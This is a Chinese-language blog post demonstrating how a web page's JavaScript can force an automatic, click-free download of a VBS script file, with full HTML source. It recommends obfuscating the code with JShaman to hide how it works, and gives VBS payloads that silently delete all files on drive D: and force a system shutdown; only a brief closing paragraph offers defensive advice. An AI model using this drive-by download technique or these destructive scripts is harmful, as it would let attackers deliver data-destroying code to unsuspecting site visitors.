JavaScript黑魔法:不可阻止的“自动下载”
正常情况下,当我们想要从网站下载某个文件时,一定是需要主动点击,才能出现下载操作。这是理所当然的。
但你是否遇到过这样一种场景:当打开某个网页时,未进行任何点击,然而后台自动下载了一个文件!
很可怕吧,像是种不可思议的黑魔法。但这是真实可以实现的,用JavaScript即可实现。
实现效果:
且看本演示:打开页面,后台自动下载了一个vbs文件。点击下载后的文件,vbs脚本文件被执行,弹出了一个hello窗口。如下:
由于是vbs脚本,因此,如果点击该文件,文件会被打开并执行:
选择打开,脚本被执行:
如页面源码所示,本示例,只是执行一句msgbox(“hello”)。
源码:
效果很不可思议,但实现的源码却很简单,完整代码如下,保存为html文件打开即可执行。
<html>
<script>
var blob = new Blob(['msgbox("hello")'],{type:'application/vbs'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'game.vbs';
a.click();
</script>
</html>而如果要防止他人查看源码、了解实现原理,可以对源码中的JavaScript代码混淆加密。
比如使用JShaman平台,对上述代码加密:
加密后的代码:
Msgbox仅是一个弹窗,而vbs是可以实现很多强大而可怕的功能的。
比如:
dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true又如:
dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “shutdown -f -s -t 00”,0 ,true能读懂这两段vbs脚本的话,可知:脚本执行可能带来很危险的后果。甚至可能下载其它的Exe并执行,等等。
防护:
如何防止这种威胁?文件是可能被自动下载的,不仅仅是vbs脚本,exe也可能。但只要不点击,便不会执行。因此,需增强安全意识,对于不明来源的文件:不点击、不打开、不执行。
JavaScript黑魔法:不可阻止的“自动下载”相关推荐
- 如何阻止迅雷自动下载?
RT:有时只想用IE直接下载点小东西,却自动弹出迅雷的"新建下载":更甚至点击一个下载跳转链接,本应该跳转到下载页面,却自动弹出"download.php"等新 ...
- 如何实现 AppStore App 的自动下载
这次的分享是关于如何在 AppStore 实现 App 的自动下载,理想中的目标是只需要一部手机,不需要人来干预,就可以模拟用户的真实下载,并在下载完成以后,可以自动更改手机参数,使之变为另外一部苹果 ...
- iOS 如何实现 AppStore 中App 的自动下载
这次的分享是关于如何在 AppStore 实现 App 的自动下载,理想中的目标是只需要一部手机,不需要人来干预,就可以模拟用户的真实下载,并在下载完成以后,可以自动更改手机参数,使之变为另外一部苹果 ...
- python爬虫捕鱼网站_Python爬虫从太平洋地震工程研究中心数据库自动下载地震波时程...
python app开发自动捕鱼" 引子-- 最近小编在沉迷捕鱼之余,扫到了某问答网站里的一个网友提问的标题叫做"Python真的有那么神吗?",各位被邀嘉宾们针对最近P ...
- 可以自动下载字幕的播放器-shooter player 射手播放器
<script type="text/javascript"></script> <script type="text/javascript ...
- 阻止计算机系统自动更新,W10电脑系统如何阻止并关闭自动更新
W10电脑系统如何阻止并关闭自动更新?很多用户升级W10 1709版本之后,发现电脑系统又自动下载一些电脑系统更新了,这让用户很是郁闷,其实想要关闭自动更新很容易,下面请随小编一起操作! W10 17 ...
- Python简单网页爬虫——极客学院视频自动下载
一.需求背景 最近正好在研究Python,看了菜鸟教程上的基本教程,然后又再看极客学院的教学视频,向实战进军. 极客学院的视频是需要年费会员才能下载的,客户端倒是可以批量下载,但是下载之后,没有目录结 ...
- Discuz发帖时将远程图片自动下载并保存至服务器
发帖的时候如果是复制别人的文章,想要直接将这些文章中的图片自动保存到自己的服务器,其实Discuz! X3.2的html编辑器已经默认支持"下载远程图片"功能. 如图: 如果是低版 ...
- 写个程序自动下载留言,没辙了:(
刚写了个HTML文件解析器,生成简单的Element树,包括所有元素. 虽然有很多解析HTML的api,只是我只要用那么一点点功能,写一下也很快. 类:HTMLElement.HTMLParser.L ...
- vue element 导出blob后台文件流xlsx文件自动下载(且规避乱码)
通常情况blob后台文件流都是如下图这样让人崩溃的乱码 <el-buttontype="success"@click.stop="handleExport" ...
最新文章
- [转载]玩转Asp.net MVC 的八个扩展点
- Github|基于 Jittor 的 GAN 模型库
- 【原创】Maven cobertura整合多个子项目下的单测覆盖率报告
- 乐鑫科技线上笔试什么内容_2020广东省公务员考试笔试考什么内容?笔试如何去备考?...
- win10推荐的锁屏壁纸该怎么保存 win10休眠锁屏壁纸保存
- eclipse3.2 汉化 汉化包下载
- 等宽字体与非等宽字体_我最喜欢的等宽字体
- PC端和移动端的区别你知道吗?
- 空间统计分析系列科普文章(By 虾神说D)
- java 模拟库存管理系统
- 网约叫车出行小程序开发制作功能介绍
- 前端学习之路(1)———表格的增行和减行
- 条码打印软件有关打印错误的解决方法
- hpuoj 1715: 感恩节KK专场——2015年的第一场雪 (暴力)
- 用 Python 通过雅虎财经获取股票数据
- 【GPGPU编程模型与架构原理】第二章 2.1 计算模型
- 如何使用 Jenkins Pipeline 流水线优雅的部署 Kubernetes 应用
- 小平方水果店怎么摆放,水果店陈列怎么比较好
- 修改Ubuntu启动项
- 数字电路硬件设计系列(一)之电源入口设计(保险丝+TVS管+防反接电路)